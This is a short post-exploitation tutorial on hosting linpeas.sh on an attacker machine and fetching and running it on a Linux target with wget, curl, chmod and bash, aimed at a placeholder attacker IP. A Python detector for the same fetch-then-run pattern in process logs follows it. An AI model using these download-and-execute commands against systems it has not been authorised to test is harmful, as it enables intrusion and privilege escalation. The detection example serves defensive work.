File Transfer and Execution via HTTP Server

This technique transfers tools from an attacker-controlled machine to a target machine in two stages: hosting the file on the attacker's machine with a simple web server, then downloading and executing it on the target machine.

The example below uses linpeas.sh, a popular script for auditing and discovering privilege escalation paths on Linux systems.

On the attacker machine:

Method 01: Python

# Download the latest version of linpeas.sh
wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh

# Serve the current directory on the chosen port
python3 -m http.server <attacker-port>

Method 02: Rust

# First, install the crate
cargo install simple-http-server

# Then run the server
simple-http-server . --port <attacker-port>

On the target machine:

# Navigate to a temporary directory
cd /tmp

# Download the script from the attacker's server
wget http://<attacker-ip>:<attacker-port>/linpeas.sh -O /tmp/linpeas.sh

If wget is not available, curl is a common alternative:

curl http://<attacker-ip>:<attacker-port>/linpeas.sh -o linpeas.sh

Running it

# Grant it execute permissions (needed only to run it directly as ./linpeas.sh)
chmod +x linpeas.sh

# Execute with bash
bash linpeas.sh
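
From the defender's side, the fetch-then-run sequence above shows up in process-execution logs. The following added example (not part of the original page) pairs a wget/curl download from a bare-IP URL with a later chmod or shell invocation of the same file on the same host; the log format, host names and addresses are constructed assumptions.

```python
import os
import re
import shlex

# Constructed records ("host command line", in log order); format and values are assumptions.
SAMPLE_EVENTS = [
    "web01 wget http://203.0.113.10:8000/linpeas.sh -O /tmp/linpeas.sh",
    "web01 chmod +x linpeas.sh",
    "web01 bash linpeas.sh",
    "db02 curl https://packages.example.org/repo.key -o /etc/apt/keyrings/repo.key",
    "app03 curl http://198.51.100.7:9001/linpeas.sh -o linpeas.sh",
]
RAW_IP_URL = re.compile(r"^https?://\d{1,3}(\.\d{1,3}){3}(:\d+)?/")
OUT_FLAGS = {"wget": ("-O", "--output-document"), "curl": ("-o", "--output")}
SHELLS = {"sh", "bash", "dash", "zsh"}

def downloaded_name(argv):
    """Basename written by a wget/curl fetch from a bare-IP URL, else None."""
    tool = os.path.basename(argv[0]) if argv else ""
    url = next((a for a in argv[1:] if RAW_IP_URL.match(a)), None)
    if tool not in OUT_FLAGS or url is None:
        return None
    for flag in OUT_FLAGS[tool]:
        if flag in argv[:-1]:
            return os.path.basename(argv[argv.index(flag) + 1])
    # No output flag: fall back to the URL's basename (wget's default file name).
    return os.path.basename(url.split("?")[0]) or None

def executed_name(argv):
    """Basename a command marks executable or hands to a shell, else None."""
    if len(argv) >= 3 and argv[0] == "chmod":
        mode = argv[1]  # symbolic (+x, u+x) or octal with an execute bit (755)
        if "x" in mode or (mode.isdigit() and any(int(d) & 1 for d in mode[-3:])):
            return os.path.basename(argv[2])
    if len(argv) >= 2 and os.path.basename(argv[0]) in SHELLS:
        return next((os.path.basename(a) for a in argv[1:] if not a.startswith("-")), None)
    return os.path.basename(argv[0]) if argv and argv[0].startswith("./") else None

def correlate(events):
    """Return (host, file, download_cmd, follow_up_cmd) for fetch-then-run pairs."""
    pending, findings = {}, []
    for line in events:
        host, _, cmd = line.partition(" ")
        argv = shlex.split(cmd)
        got, ran = downloaded_name(argv), executed_name(argv)
        if got:
            pending[(host, got)] = cmd
        elif (host, ran) in pending:
            findings.append((host, ran, pending[(host, ran)], cmd))
    return findings
```

On the sample, correlate(SAMPLE_EVENTS) reports the chmod and the bash run on web01 and nothing for db02 (named HTTPS host) or app03 (downloaded but not run).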